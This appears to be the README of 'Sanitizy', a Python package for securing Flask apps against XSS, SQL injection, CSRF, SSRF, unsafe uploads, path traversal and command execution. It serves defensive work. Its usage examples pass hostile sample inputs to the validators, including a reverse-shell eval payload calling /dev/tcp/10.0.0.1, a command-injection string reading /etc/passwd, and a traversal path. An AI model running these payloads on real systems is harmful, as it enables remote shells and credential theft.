Sanitizy

This is a simple and very light weight python package to help securing python web applications in general especially Flask apps since they lack security !!

Usage:

XSS:

Escape some value:

from sanitizy import *

XSS.escape('<h1>')# produces: '&lt;h1&gt;'  

Escape all Flask's paramaters GET:

XSS.escape_args(request)#produces a dict with escaped values  

Escape all Flask's paramaters POST:

XSS.escape_form(request)#produces a dict with escaped values 

SQL-Injection:

Escape some value:

from sanitizy import *

SQLI.escape("' or 1=1 or '")# produces: "\' or 1=1 or \'"  

Escape all Flask's paramaters GET:

SQLI.escape_args(request)#produces a dict with escaped values 

Escape all Flask's paramaters POST:

SQLI.escape_form(request)#produces a dict with escaped values 

CSRF:

Check if the request is coming from the application itself or not:

CSRF.validate("http://www.google.com",["www.google.com","www.bing.com"])#takes the referer header value and a list of allowed domains, then returns 'True' if it's safe and 'False' if not  

Check if the request is coming from the Falsk application itself or not:

CSRF.validate_flask(request)#returns 'True' if it's safe and 'False' if not  

SSRF:

Validate if the url can lead to a SSRF:

SSRF.validate("http://localhost:22",url=True)#returns 'True' if it's safe and 'False' if not  

Validate if the domain can lead to a SSRF:

SSRF.validate("localhost:22",url=False)#returns 'True' if it's safe and 'False' if not  

File Upload:

Check if the file is safe or not:

FILE_UPLOAD.check_file(request.files['file'],allowed_extensions=['png','jpg','jpeg','gif','pdf'],allowed_mimetypes=["application/pdf","application/x-pdf","image/png","image/jpg","image/jpeg"])#returns 'True' if it's safe and 'False' if not  

Save files securely:

FILE_UPLOAD.save_file(request.files['file'],path="uploads/")#it will returns the path to the uploaded file

Path Traversal:

Check if the file is safe to open/download or not:

PATH_TRAVERSAL.check("../../../../../../etc/passwd")#returns 'True' if it's safe and 'False' if not  

RCE (Remote Code/Command Execution):

Check value is safe to pass to a command or not:

RCE.command("ls -a ;cat /etc/passwd ")#returns 'True' if it's safe and 'False' if not  

Check value is safe to pass to an "eval" function or not:

RCE.eval("__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")#returns 'True' if it's safe and 'False' if not  

Validate User Inputs:

Check value contains alphabets only:

FORM_INPUTS.alphabet("ala bouali",length=(1,50))#returns 'True' if it's correct and 'False' if not  

Check if value contains numbers only:

FORM_INPUTS.numeric("233 21 4",length=(1,15))#returns 'True' if it's correct and 'False' if not  

Check if value contains alphabets only:

FORM_INPUTS.alphabet("ala bouali",length=(1,50))#returns 'True' if it's correct and 'False' if not  

Check if value is alphanumeric:

FORM_INPUTS.alphanumeric(" ala bOuali12 56",length=(1,50))#returns 'True' if it's correct and 'False' if not  

Check if value is an Email:

FORM_INPUTS.email("alabouali@gmail.com",length=(6,15))#returns 'True' if it's correct and 'False' if not  

Check if value is a Phone Number:

FORM_INPUTS.phone_number("+123456789",length=(6,15))#returns 'True' if it's correct and 'False' if not  

Check if value is a long enough Password:

FORM_INPUTS.password("fvccabah$vhj",length=(8,15))#returns 'True' if it's correct and 'False' if not  

Check if 2 Passwords match and if they are long enough:

FORM_INPUTS.passwords_match("fvccabah$vhj","fvccabah$234",length=(8,15))#returns 'True' if it's correct and 'False' if not  

Check if value matches a specific Regex:

FORM_INPUTS.regex_match("alabouali@gmail.com",r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',length=(6,15))#returns 'True' if it's correct and 'False' if not